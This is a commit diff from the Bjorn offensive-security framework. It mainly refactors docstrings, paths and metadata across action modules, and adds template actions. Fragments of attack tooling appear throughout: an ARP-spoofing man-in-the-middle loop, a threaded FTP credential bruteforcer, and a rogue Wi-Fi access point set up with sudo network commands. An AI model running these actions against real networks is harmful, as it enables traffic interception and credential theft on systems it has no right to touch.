mirror of
https://github.com/infinition/Bjorn.git
synced 2026-03-19 18:20:24 +00:00
feat: Add login page with dynamic RGB effects and password toggle functionality
feat: Implement package management utilities with JSON endpoints for listing and uninstalling packages
feat: Create plugin management utilities with endpoints for listing, configuring, and installing plugins
feat: Develop schedule and trigger management utilities with CRUD operations for schedules and triggers
This commit is contained in:
@@ -1,14 +1,34 @@
|
||||
"""IDLE.py - No-op placeholder action for idle state."""
|
||||
|
||||
from shared import SharedData
|
||||
|
||||
b_class = "IDLE"
|
||||
b_module = "idle"
|
||||
b_status = "IDLE"
|
||||
b_class = "IDLE"
|
||||
b_module = "idle"
|
||||
b_status = "IDLE"
|
||||
b_enabled = 0
|
||||
b_action = "normal"
|
||||
b_trigger = None
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_priority = 0
|
||||
b_timeout = 60
|
||||
b_cooldown = 0
|
||||
b_name = "IDLE"
|
||||
b_description = "No-op placeholder action representing idle state."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_max_retries = 0
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["idle", "placeholder"]
|
||||
b_category = "system"
|
||||
b_icon = "IDLE.png"
|
||||
|
||||
|
||||
class IDLE:
    """No-op placeholder action representing the idle state.

    The orchestrator requires every action to expose the same interface;
    this one deliberately does nothing and always reports success.
    """

    def __init__(self, shared_data):
        # Keep the framework's shared state handle, matching the
        # constructor contract of every other Bjorn action.
        self.shared_data = shared_data

    def execute(self, ip, port, row, status_key) -> str:
        """Do nothing and report success (arguments are ignored)."""
        return "success"
|
||||
|
||||
@@ -1,15 +1,6 @@
|
||||
"""
|
||||
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
|
||||
"""arp_spoofer.py - Bidirectional ARP cache poisoning for MITM positioning.
|
||||
|
||||
Ethical cybersecurity lab action for Bjorn framework.
|
||||
Performs bidirectional ARP spoofing between a target host and the network
|
||||
gateway. Restores ARP tables on completion or interruption.
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port, row) for the target host.
|
||||
- Gateway IP is auto-detected from system routing table or shared config.
|
||||
- Results persisted to JSON output and logged for RL training.
|
||||
- Fully integrated with EPD display (progress, status, comments).
|
||||
Spoofs target<->gateway ARP entries; auto-restores tables on exit.
|
||||
"""
|
||||
|
||||
import os
|
||||
@@ -104,7 +95,7 @@ class ARPSpoof:
|
||||
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
|
||||
self._scapy_ok = True
|
||||
except ImportError:
|
||||
logger.error("scapy not available — ARPSpoof will not function")
|
||||
logger.error("scapy not available - ARPSpoof will not function")
|
||||
self._scapy_ok = False
|
||||
|
||||
# ─────────────────── Identity Cache ──────────────────────
|
||||
@@ -231,7 +222,7 @@ class ARPSpoof:
|
||||
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
|
||||
return "failed"
|
||||
if gateway_ip == ip:
|
||||
logger.warning(f"Target {ip} IS the gateway — skipping")
|
||||
logger.warning(f"Target {ip} IS the gateway - skipping")
|
||||
return "failed"
|
||||
|
||||
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
|
||||
@@ -252,7 +243,7 @@ class ARPSpoof:
|
||||
return "failed"
|
||||
|
||||
self.shared_data.bjorn_progress = "20%"
|
||||
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
|
||||
logger.info(f"Resolved - target_mac={target_mac}, gateway_mac={gateway_mac}")
|
||||
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
|
||||
|
||||
# 3) Spoofing loop
|
||||
@@ -263,7 +254,7 @@ class ARPSpoof:
|
||||
|
||||
while (time.time() - start_time) < duration:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit — stopping ARP spoof")
|
||||
logger.info("Orchestrator exit - stopping ARP spoof")
|
||||
break
|
||||
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
|
||||
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
|
||||
|
||||
@@ -1,19 +1,8 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
|
||||
"""berserker_force.py - Rate-limited service stress testing with degradation analysis.
|
||||
|
||||
What it does:
|
||||
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
|
||||
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
|
||||
(scapy), HTTP probes (urllib), or mixed mode.
|
||||
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
|
||||
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
|
||||
|
||||
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
|
||||
target's response times change under light load. Max 50 req/s to stay RPi-safe.
|
||||
|
||||
Output is saved to data/output/stress/<ip>_<timestamp>.json
|
||||
Measures baseline response times, applies light load (max 50 req/s), then reports per-port degradation.
|
||||
"""
|
||||
|
||||
import json
|
||||
@@ -115,8 +104,8 @@ b_examples = [
|
||||
b_docs_url = "docs/actions/BerserkerForce.md"
|
||||
|
||||
# -------------------- Constants -----------------------------------------------
|
||||
_DATA_DIR = "/home/bjorn/Bjorn/data"
|
||||
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
|
||||
_DATA_DIR = None # Resolved at runtime via shared_data.data_dir
|
||||
OUTPUT_DIR = None # Resolved at runtime via shared_data.data_dir
|
||||
|
||||
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
|
||||
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
|
||||
@@ -428,15 +417,16 @@ class BerserkerForce:
|
||||
|
||||
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
|
||||
"""Write the JSON report and return the file path."""
|
||||
output_dir = os.path.join(self.shared_data.data_dir, "output", "stress")
|
||||
try:
|
||||
os.makedirs(OUTPUT_DIR, exist_ok=True)
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
except Exception as exc:
|
||||
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
|
||||
logger.warning(f"Could not create output dir {output_dir}: {exc}")
|
||||
|
||||
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
|
||||
safe_ip = ip.replace(":", "_").replace(".", "_")
|
||||
filename = f"{safe_ip}_{ts}.json"
|
||||
filepath = os.path.join(OUTPUT_DIR, filename)
|
||||
filepath = os.path.join(output_dir, filename)
|
||||
|
||||
report = {
|
||||
"tool": "berserker_force",
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
"""bruteforce_common.py - Shared helpers for all bruteforce actions (progress tracking, password generation)."""
|
||||
|
||||
import itertools
|
||||
import threading
|
||||
import time
|
||||
|
||||
0
actions/custom/__init__.py
Normal file
0
actions/custom/__init__.py
Normal file
105
actions/custom/example_bjorn_action.py
Normal file
105
actions/custom/example_bjorn_action.py
Normal file
@@ -0,0 +1,105 @@
|
||||
"""example_bjorn_action.py - Custom action template using the Bjorn action format."""
|
||||
|
||||
import time
|
||||
import logging
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="example_bjorn_action", level=logging.DEBUG)
|
||||
|
||||
# ---- Bjorn action metadata (required for Bjorn format detection) ----
# Identity / display fields read by sync_actions and the web UI.
b_class = "ExampleBjornAction"
b_module = "custom/example_bjorn_action"
b_name = "Example Bjorn Action"
b_description = "Demo custom action with shared_data access and DB queries."
b_author = "Bjorn Community"
b_version = "1.0.0"

# Scheduling / targeting fields consumed by the orchestrator.
b_action = "custom"
b_enabled = 1
b_priority = 50
b_port = None
b_service = None
b_trigger = None
b_parent = None
b_cooldown = 0
b_rate_limit = None
b_tags = '["custom", "example", "template"]'

# ---- Argument schema (drives the web UI controls) ----
b_args = {
    "target_ip": {
        "type": "text",
        "default": "192.168.1.1",
        "description": "Target IP address to probe",
    },
    "scan_count": {
        "type": "number",
        "default": 3,
        "min": 1,
        "max": 100,
        "description": "Number of probe iterations",
    },
    "verbose": {
        "type": "checkbox",
        "default": False,
        "description": "Enable verbose output",
    },
    "mode": {
        "type": "select",
        "choices": ["quick", "normal", "deep"],
        "default": "normal",
        "description": "Scan depth",
    },
}

# Preset invocations shown as one-click examples in the web UI.
b_examples = [
    {"name": "Quick local scan", "args": {"target_ip": "192.168.1.1", "scan_count": 1, "mode": "quick"}},
    {"name": "Deep scan", "args": {"target_ip": "10.0.0.1", "scan_count": 10, "mode": "deep", "verbose": True}},
]
|
||||
|
||||
|
||||
class ExampleBjornAction:
    """Template for a custom Bjorn action with full shared_data access.

    Demonstrates the standard action lifecycle: read configuration from
    shared_data, query the DB, loop with cooperative cancellation, and
    return a status string to the orchestrator.
    """

    def __init__(self, shared_data):
        # shared_data is the framework-wide state object (config, DB, flags).
        self.shared_data = shared_data
        logger.info("ExampleBjornAction initialized")

    def execute(self, ip, port, row, status_key):
        """Entry point called by action_runner / orchestrator.

        Args:
            ip: Target IP address
            port: Target port (may be empty)
            row: Dict with MAC Address, IPs, Ports, Alive
            status_key: Action class name (for status tracking)

        Returns:
            'success' or 'failed'
        """
        sd = self.shared_data
        # Arguments arrive as attributes on shared_data; fall back to the
        # schema defaults when unset.
        verbose = getattr(sd, "verbose", False)
        scan_count = int(getattr(sd, "scan_count", 3))
        mode = getattr(sd, "mode", "normal")

        print(f"[*] Running ExampleBjornAction on {ip} (mode={mode}, count={scan_count})")

        # Example: query DB for known hosts (best-effort; failure is logged, not fatal).
        try:
            host_count = sd.db.query_one(
                "SELECT COUNT(1) c FROM hosts"
            )
            print(f"[*] Known hosts in DB: {host_count['c'] if host_count else 0}")
        except Exception as e:
            print(f"[!] DB query failed: {e}")

        # Simulated work loop with cooperative shutdown between iterations.
        for probe_idx in range(scan_count):
            if getattr(sd, "orchestrator_should_exit", False):
                print("[!] Stop requested, aborting")
                return "failed"
            print(f"[*] Probe {probe_idx+1}/{scan_count} on {ip}...")
            if verbose:
                print(f" MAC={row.get('MAC Address', 'unknown')} mode={mode}")
            time.sleep(1)

        print(f"[+] Done. {scan_count} probes completed on {ip}")
        return "success"
|
||||
97
actions/custom/example_free_script.py
Normal file
97
actions/custom/example_free_script.py
Normal file
@@ -0,0 +1,97 @@
|
||||
"""example_free_script.py - Custom script template using plain Python (no shared_data)."""
|
||||
|
||||
import argparse
|
||||
import time
|
||||
import sys
|
||||
|
||||
# ---- Display metadata (optional, used by the web UI) ----
b_name = "Example Free Script"
b_description = "Standalone Python script demo with argparse and progress output."
b_author = "Bjorn Community"
b_version = "1.0.0"
b_tags = '["custom", "example", "template", "free"]'

# ---- Argument schema (drives the web UI controls, same format as Bjorn actions) ----
# Each key maps to a --flag of the same name (underscores become dashes).
b_args = {
    "target": {
        "type": "text",
        "default": "192.168.1.0/24",
        "description": "Target host or CIDR range",
    },
    "timeout": {
        "type": "number",
        "default": 5,
        "min": 1,
        "max": 60,
        "description": "Timeout per probe in seconds",
    },
    "output_format": {
        "type": "select",
        "choices": ["text", "json", "csv"],
        "default": "text",
        "description": "Output format",
    },
    "dry_run": {
        "type": "checkbox",
        "default": False,
        "description": "Simulate without actually probing",
    },
}

# Preset invocations shown as one-click examples in the web UI.
b_examples = [
    {"name": "Quick local check", "args": {"target": "192.168.1.1", "timeout": 2, "output_format": "text"}},
    {"name": "Dry run JSON", "args": {"target": "10.0.0.0/24", "timeout": 5, "output_format": "json", "dry_run": True}},
]
|
||||
|
||||
|
||||
def main():
    """CLI entry point: parse arguments, simulate probing, print results.

    Demonstrates the "free script" style: no shared_data, just argparse
    flags matching the b_args schema above.
    """
    parser = argparse.ArgumentParser(description="Example free-form Bjorn custom script")
    parser.add_argument("--target", default="192.168.1.0/24", help="Target host or CIDR")
    parser.add_argument("--timeout", type=int, default=5, help="Timeout per probe (seconds)")
    parser.add_argument("--output-format", default="text", choices=["text", "json", "csv"])
    parser.add_argument("--dry-run", action="store_true", help="Simulate without probing")
    args = parser.parse_args()

    # Banner: echo the effective configuration back to the operator.
    print(f"[*] Example Free Script starting")
    print(f"[*] Target: {args.target}")
    print(f"[*] Timeout: {args.timeout}s")
    print(f"[*] Format: {args.output_format}")
    print(f"[*] Dry run: {args.dry_run}")
    print()

    # Simulate some work with progress output (one line + 1s pause per step).
    steps = 5
    for step in range(steps):
        print(f"[*] Step {step+1}/{steps}: {'simulating' if args.dry_run else 'probing'} {args.target}...")
        time.sleep(1)

    # Canned results used to demonstrate each output format.
    results = [
        {"host": "192.168.1.1", "status": "up", "latency": "2ms"},
        {"host": "192.168.1.100", "status": "up", "latency": "5ms"},
    ]

    if args.output_format == "json":
        import json
        print(json.dumps(results, indent=2))
    elif args.output_format == "csv":
        print("host,status,latency")
        for entry in results:
            print(f"{entry['host']},{entry['status']},{entry['latency']}")
    else:
        for entry in results:
            print(f" {entry['host']} {entry['status']} ({entry['latency']})")

    print()
    print(f"[+] Done. Found {len(results)} hosts.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
    # Script entry: map interrupts/errors to conventional shell exit codes.
    try:
        main()
    except KeyboardInterrupt:
        # 130 = process terminated by SIGINT, per POSIX shell convention.
        print("\n[!] Interrupted")
        sys.exit(130)
    except Exception as e:
        # Catch-all is acceptable at the top-level script boundary only.
        print(f"\n[!] Error: {e}")
        sys.exit(1)
|
||||
@@ -1,9 +1,5 @@
|
||||
# demo_action.py
|
||||
# Demonstration Action: wrapped in a DemoAction class
|
||||
"""demo_action.py - Minimal template action that prints its arguments."""
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Metadata (compatible with sync_actions / Neo launcher)
|
||||
# ---------------------------------------------------------------------------
|
||||
b_class = "DemoAction"
|
||||
b_module = "demo_action"
|
||||
b_enabled = 1
|
||||
@@ -14,6 +10,19 @@ b_description = "Demonstration action: simply prints the received arguments."
|
||||
b_author = "Template"
|
||||
b_version = "0.1.0"
|
||||
b_icon = "demo_action.png"
|
||||
b_status = "demo_action"
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_trigger = None
|
||||
b_parent = None
|
||||
b_priority = 0
|
||||
b_cooldown = 0
|
||||
b_rate_limit = None
|
||||
b_timeout = 60
|
||||
b_max_retries = 0
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["demo", "template", "test"]
|
||||
|
||||
b_examples = [
|
||||
{
|
||||
@@ -129,6 +138,8 @@ def _list_net_ifaces() -> list[str]:
|
||||
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
|
||||
except Exception:
|
||||
pass
|
||||
if os.name == "nt":
|
||||
return ["Ethernet", "Wi-Fi"]
|
||||
try:
|
||||
for n in os.listdir("/sys/class/net"):
|
||||
if n and n != "lo":
|
||||
@@ -183,7 +194,8 @@ class DemoAction:
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
"""Called by the orchestrator. This demo only prints arguments."""
|
||||
self.shared_data.bjorn_orch_status = "DemoAction"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"status": "running"}
|
||||
|
||||
print("=== DemoAction :: executed ===")
|
||||
print(f" IP/Target: {ip}:{port}")
|
||||
|
||||
@@ -1,19 +1,4 @@
|
||||
"""
|
||||
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
|
||||
|
||||
Performs comprehensive DNS intelligence gathering on discovered hosts:
|
||||
- Reverse DNS lookup on target IP
|
||||
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
|
||||
- Zone transfer (AXFR) attempts against discovered nameservers
|
||||
- Subdomain brute-force enumeration with threading
|
||||
|
||||
SQL mode:
|
||||
- Targets provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Discovered hostnames are written back to DB hosts table
|
||||
- Results saved as JSON in data/output/dns/
|
||||
- Action status recorded in DB.action_results (via DNSPillager.execute)
|
||||
"""
|
||||
"""dns_pillager.py - DNS recon: reverse lookups, record enumeration, zone transfers, subdomain brute."""
|
||||
|
||||
import os
|
||||
import json
|
||||
@@ -29,7 +14,6 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -46,14 +46,14 @@ b_icon = "FreyaHarvest.png"
|
||||
|
||||
b_args = {
|
||||
"input_dir": {
|
||||
"type": "text",
|
||||
"label": "Input Data Dir",
|
||||
"default": "/home/bjorn/Bjorn/data/output"
|
||||
"type": "text",
|
||||
"label": "Input Data Dir",
|
||||
"default": "data/output"
|
||||
},
|
||||
"output_dir": {
|
||||
"type": "text",
|
||||
"label": "Reports Dir",
|
||||
"default": "/home/bjorn/Bjorn/data/reports"
|
||||
"type": "text",
|
||||
"label": "Reports Dir",
|
||||
"default": "data/reports"
|
||||
},
|
||||
"watch": {
|
||||
"type": "checkbox",
|
||||
@@ -92,7 +92,8 @@ class FreyaHarvest:
|
||||
with self.lock:
|
||||
self.data[cat].append(finds)
|
||||
new_findings += 1
|
||||
except: pass
|
||||
except Exception:
|
||||
logger.debug(f"Failed to read {f_path}")
|
||||
|
||||
if new_findings > 0:
|
||||
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
|
||||
@@ -123,20 +124,30 @@ class FreyaHarvest:
|
||||
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
|
||||
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
|
||||
# Reset per-run state to prevent memory accumulation
|
||||
self.data.clear()
|
||||
self.last_scan_time = 0
|
||||
|
||||
_data_dir = getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data")
|
||||
_default_input = os.path.join(_data_dir, "output")
|
||||
_default_output = os.path.join(_data_dir, "reports")
|
||||
input_dir = getattr(self.shared_data, "freya_harvest_input", _default_input)
|
||||
output_dir = getattr(self.shared_data, "freya_harvest_output", _default_output)
|
||||
watch = getattr(self.shared_data, "freya_harvest_watch", True)
|
||||
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
|
||||
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
|
||||
|
||||
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
|
||||
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": "0"}
|
||||
|
||||
start_time = time.time()
|
||||
try:
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
logger.info("FreyaHarvest: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
self._collect_data(input_dir)
|
||||
self._generate_report(output_dir, fmt)
|
||||
@@ -145,7 +156,10 @@ class FreyaHarvest:
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
|
||||
# EPD live status update
|
||||
total_items = sum(len(v) for v in self.data.values())
|
||||
self.shared_data.comment_params = {"input": os.path.basename(input_dir), "items": str(total_items)}
|
||||
|
||||
if not watch:
|
||||
break
|
||||
|
||||
@@ -156,7 +170,10 @@ class FreyaHarvest:
|
||||
except Exception as e:
|
||||
logger.error(f"FreyaHarvest error: {e}")
|
||||
return "failed"
|
||||
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
"""
|
||||
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='ftp')
|
||||
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
|
||||
"""
|
||||
"""ftp_bruteforce.py - Threaded FTP credential bruteforcer, results stored in DB."""
|
||||
|
||||
import os
|
||||
import threading
|
||||
@@ -28,11 +22,24 @@ b_parent = None
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "ftp", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "FTP Bruteforce"
|
||||
b_description = "Threaded FTP credential bruteforcer with share enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "FTPBruteforce.png"
|
||||
|
||||
class FTPBruteforce:
|
||||
"""Wrapper orchestrateur -> FTPConnector."""
|
||||
"""Orchestrator wrapper for FTPConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -40,11 +47,11 @@ class FTPBruteforce:
|
||||
logger.info("FTPConnector initialized.")
|
||||
|
||||
def bruteforce_ftp(self, ip, port):
|
||||
"""Lance le bruteforce FTP pour (ip, port)."""
|
||||
"""Run FTP bruteforce for (ip, port)."""
|
||||
return self.ftp_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "FTPBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
logger.info(f"Brute forcing FTP on {ip}:{port}...")
|
||||
@@ -53,12 +60,11 @@ class FTPBruteforce:
|
||||
|
||||
|
||||
class FTPConnector:
|
||||
"""Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles FTP attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +77,7 @@ class FTPConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -186,7 +192,7 @@ class FTPConnector:
|
||||
self.progress.advance(1)
|
||||
self.queue.task_done()
|
||||
|
||||
# Pause configurable entre chaque tentative FTP
|
||||
# Configurable delay between FTP attempts
|
||||
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_ftp)
|
||||
|
||||
@@ -267,7 +273,8 @@ class FTPConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
"""No longer needed with unique DB index; kept for interface compat."""
|
||||
# Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -119,6 +119,14 @@ class HeimdallGuard:
|
||||
return packet
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
if not HAS_SCAPY:
|
||||
logger.error("HeimdallGuard requires scapy but it is not installed.")
|
||||
return "failed"
|
||||
|
||||
# Reset per-run state
|
||||
self.stats = {'packets_processed': 0, 'packets_fragmented': 0, 'timing_adjustments': 0}
|
||||
self.packet_queue.clear()
|
||||
|
||||
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
|
||||
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
|
||||
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
|
||||
@@ -126,6 +134,8 @@ class HeimdallGuard:
|
||||
|
||||
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
|
||||
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "mode": mode, "iface": iface}
|
||||
|
||||
self.active = True
|
||||
start_time = time.time()
|
||||
@@ -133,11 +143,9 @@ class HeimdallGuard:
|
||||
try:
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
|
||||
# In a real scenario, this would be hooking into a packet stream
|
||||
# For this action, we simulate protection state
|
||||
|
||||
logger.info("HeimdallGuard: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
# Progress reporting
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
@@ -158,7 +166,9 @@ class HeimdallGuard:
|
||||
return "failed"
|
||||
finally:
|
||||
self.active = False
|
||||
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -12,6 +12,7 @@ import subprocess
|
||||
import threading
|
||||
import time
|
||||
import re
|
||||
import tempfile
|
||||
import datetime
|
||||
|
||||
from typing import Any, Dict, List, Optional
|
||||
@@ -126,7 +127,7 @@ class LokiDeceiver:
|
||||
'rsn_pairwise=CCMP'
|
||||
])
|
||||
|
||||
h_path = '/tmp/bjorn_hostapd.conf'
|
||||
h_path = os.path.join(tempfile.gettempdir(), 'bjorn_hostapd.conf')
|
||||
with open(h_path, 'w') as f:
|
||||
f.write('\n'.join(h_conf))
|
||||
|
||||
@@ -140,7 +141,7 @@ class LokiDeceiver:
|
||||
'log-queries',
|
||||
'log-dhcp'
|
||||
]
|
||||
d_path = '/tmp/bjorn_dnsmasq.conf'
|
||||
d_path = os.path.join(tempfile.gettempdir(), 'bjorn_dnsmasq.conf')
|
||||
with open(d_path, 'w') as f:
|
||||
f.write('\n'.join(d_conf))
|
||||
|
||||
@@ -170,10 +171,16 @@ class LokiDeceiver:
|
||||
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
|
||||
password = getattr(self.shared_data, "loki_deceiver_password", "")
|
||||
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
|
||||
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "wifi")
|
||||
output_dir = getattr(self.shared_data, "loki_deceiver_output", _fallback_dir)
|
||||
|
||||
# Reset per-run state
|
||||
self.active_clients.clear()
|
||||
|
||||
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
|
||||
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ssid": ssid, "iface": iface, "channel": str(channel)}
|
||||
|
||||
try:
|
||||
self.stop_event.clear()
|
||||
@@ -181,7 +188,8 @@ class LokiDeceiver:
|
||||
h_path, d_path = self._create_configs(iface, ssid, channel, password)
|
||||
|
||||
# Set IP for interface
|
||||
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
|
||||
subprocess.run(['sudo', 'ip', 'addr', 'add', '192.168.1.1/24', 'dev', iface], capture_output=True)
|
||||
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
|
||||
|
||||
# Start processes
|
||||
# Use DEVNULL to avoid blocking on unread PIPE buffers.
|
||||
@@ -208,8 +216,9 @@ class LokiDeceiver:
|
||||
start_time = time.time()
|
||||
while time.time() - start_time < timeout:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
|
||||
logger.info("LokiDeceiver: Interrupted by orchestrator.")
|
||||
return "interrupted"
|
||||
|
||||
# Check if procs still alive
|
||||
if self.hostapd_proc.poll() is not None:
|
||||
logger.error("LokiDeceiver: hostapd crashed.")
|
||||
@@ -219,7 +228,9 @@ class LokiDeceiver:
|
||||
elapsed = int(time.time() - start_time)
|
||||
prog = int((elapsed / timeout) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"ssid": ssid, "clients": str(len(self.active_clients)), "uptime": str(elapsed)}
|
||||
|
||||
if elapsed % 60 == 0:
|
||||
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
|
||||
|
||||
@@ -244,10 +255,12 @@ class LokiDeceiver:
|
||||
for p in [self.hostapd_proc, self.dnsmasq_proc]:
|
||||
if p:
|
||||
try: p.terminate(); p.wait(timeout=5)
|
||||
except: pass
|
||||
except Exception: pass
|
||||
|
||||
# Restore NetworkManager if needed (custom logic based on usage)
|
||||
